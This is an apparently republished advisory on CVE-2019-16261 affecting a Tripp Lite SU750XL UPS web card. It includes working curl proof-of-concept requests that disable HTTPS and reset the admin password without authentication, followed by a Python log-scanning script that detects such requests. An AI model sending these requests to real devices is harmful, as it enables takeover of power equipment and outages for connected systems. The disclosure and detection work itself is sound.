Tripp Lite SU750XL UPS Privilege Escalation / Missing Authentication

20 Mar 2025 | Reported by Lucas Lalumiere, Jim Becher | Type: packetstorm | Source: packetstorm.news

Critical vulnerability in Tripp Lite SU750XL UPS allows unauthorized access and power disruption.

[Author]: Lucas Lalumiere
    [Contact]: [email protected]
    [Date]: 2025-3-17
    [Vendor]: Tripp Lite
    [Product]: SU750XL UPS
    [Firmware]: 12.04.0052
    [CVE Reference]: CVE-2019-16261
    
    ============================
    Affected Products (Tested):
    ============================
    - Tripp Lite PDU's (e.g., PDUMH15AT)
    - Tripp Lite UPS's (e.g., SU750XL)   *NEW*
    
    ======================
    Vulnerability Summary:
    ======================
    CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
    PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
    POST requests to the `/Forms/` directory to:
    - Change admin or manager passwords
    - Shut off power to an outlet
    - Disable/enable services
    
    Through my own experimentation, I have discovered that this vulnerability
    is also effective on Tripp Lite UPS systems, including my Tripp Lite
    SU750XL, and applies to firmware 12.04.0052. This suggests the issue
    extends beyond just PDUs, as mentioned in the CVE, to the network cards
    equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with
    vulnerable firmware versions 12.04.0053 and below.
    
    =========================
    Proof of Concept (PoC):
    =========================
    These curl commands, similar to those provided originally by Jim Becher's
    blog, are among those I've tested on the SU750XL.
    
    1. Turning off Services (like HTTPS):
    ```
    curl -X POST -d \
    "netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes" \
    http://[DEVICE_IP]/Forms/network_web_1
    
    curl -X POST -d "startreset=Restart+PowerAlert" \
    http://[DEVICE_IP]/Forms/requestreset_1
    ```
    
    Result (PowerAlert terminal):
    ```
        System settings were changed.
        Initiating system shutdown procedure ... complete.
        The system is restarting now.
    
        ...
    
        SERVICES:
        HTTP    is enabled  on port 80
        HTTPS   is disabled on port 443
        SSH     is enabled  on port 22
        TELNET  is enabled  on port 23
        FTP     is enabled  on port 21
        SYSLOG  is enabled
    ```
    
    2. Change Admin Password
    ```
    curl -X POST -d \
    "securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes" \
    http://[DEVICE_IP]/Forms/system_security_1
    
    curl -X POST -d "startreset=Restart+PowerAlert" \
    http://[DEVICE_IP]/Forms/requestreset_1
    ```
    
    Result (PowerAlert terminal):
    ```
        System settings were changed.
        Initiating system shutdown procedure ... complete.
        The system is restarting now.
    
        ...
    
        Login: newadmin
        Password: *****
        Logged in as user newadmin
        $ _
    ```
    
    =======
    Impact:
    =======
    - High Availability Impact: Attackers can remotely control power functions,
    affecting critical systems connected to PDU/UPS'.
    - High Confidentiality Impact: Attackers can obtain admin access to any of
    the device's information via changing credentials.
    - High Integrity Impact: Attackers, if not through the POST requests, can
    modify any configuration by using modified admin credentials.
    
    ===============
    Exploit Status:
    ===============
    This vulnerability has already been patched in newer network card firmware
    versions and acknowledged by Eaton. It was previously reported in
    CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.
    
    =======================
    Recommended Mitigation:
    =======================
    Upgrade webcard firmware to the newest version. You can find the download
    here:
     - https://tripplite.eaton.com/support/downloads?type=software&subtype=32
    
    ===========
    References:
    ===========
    - Original discovery:
    https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
    - CVE-2019-16261:
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261
    
    ====================
    Discoverer/Credits:
    ====================
     - Jim Becher, 2019-08-19
    
    This disclosure is being submitted to expand upon the original CVE report,
    adding additional affected products and detail. My find confirms that both
    Tripp Lite UPS and PDU devices equipped with optional network cards (e.g.
    SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.
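
A defender-side check for the requests described in the advisory, as an added example (not part of the original advisory or any vendor tooling): it scans proxy or sensor logs for POSTs to `/Forms/` from hosts outside an admin allowlist and marks setting changes that were followed by a `requestreset_1` restart. The log format, the `ADMIN_SOURCES` range and `RESTART_WINDOW` are assumptions, and the sample lines are constructed.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Assumption: the only hosts that should administer the web cards.
ADMIN_SOURCES = [ipaddress.ip_network("10.20.0.0/28")]
# /Forms/ handlers named in the advisory and what a POST to each one changes.
KNOWN_FORMS = {"network_web_1": "web service settings",
               "system_security_1": "admin credentials",
               "requestreset_1": "PowerAlert restart"}
RESTART_WINDOW = timedelta(minutes=5)  # assumption: max gap between change and restart
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) (?P<path>\S+)$")
# Constructed sample in a hypothetical sensor format: timestamp src dst method path
SAMPLE_LOG = """\
2025-03-17T09:00:01 10.20.0.5 10.30.0.40 POST /Forms/network_web_1
2025-03-17T09:14:10 10.50.7.23 10.30.0.40 GET /index.html
2025-03-17T09:14:12 10.50.7.23 10.30.0.40 POST /Forms/system_security_1
2025-03-17T09:14:20 10.50.7.23 10.30.0.40 POST /Forms/requestreset_1
2025-03-17T11:02:00 10.50.9.9 10.30.0.41 POST /Forms/network_web_1
"""

def is_admin(src):
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False  # an unparsable source address is never trusted
    return any(addr in net for net in ADMIN_SOURCES)

def find_alerts(log_text):  # one alert per POST to /Forms/ from a non-admin source
    alerts, pending = [], {}  # pending: (src, dst) -> last setting-change alert
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if not path.lower().startswith("/forms/") or is_admin(m["src"]):
            continue
        form, ts = path[len("/forms/"):], datetime.fromisoformat(m["ts"])
        alert = {"time": ts, "src": m["src"], "dst": m["dst"], "form": form,
                 "what": KNOWN_FORMS.get(form, "unrecognised form"),
                 "followed_by_restart": False}
        alerts.append(alert)
        if form == "requestreset_1":
            change = pending.pop((m["src"], m["dst"]), None)
            if change and ts - change["time"] <= RESTART_WINDOW:
                change["followed_by_restart"] = True  # the change was applied
        else:
            pending[(m["src"], m["dst"])] = alert
    return alerts
```

Call `find_alerts()` on exported log text; an alert with `followed_by_restart` set is the highest-priority case, since the advisory's PoC applies each change with a restart.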

Published: 20 Mar 2025 00:00
Vulners AI Score: 7.4 (High risk)
CVSS 2: 8.5
CVSS 3.1: 9.1
EPSS: 0.00942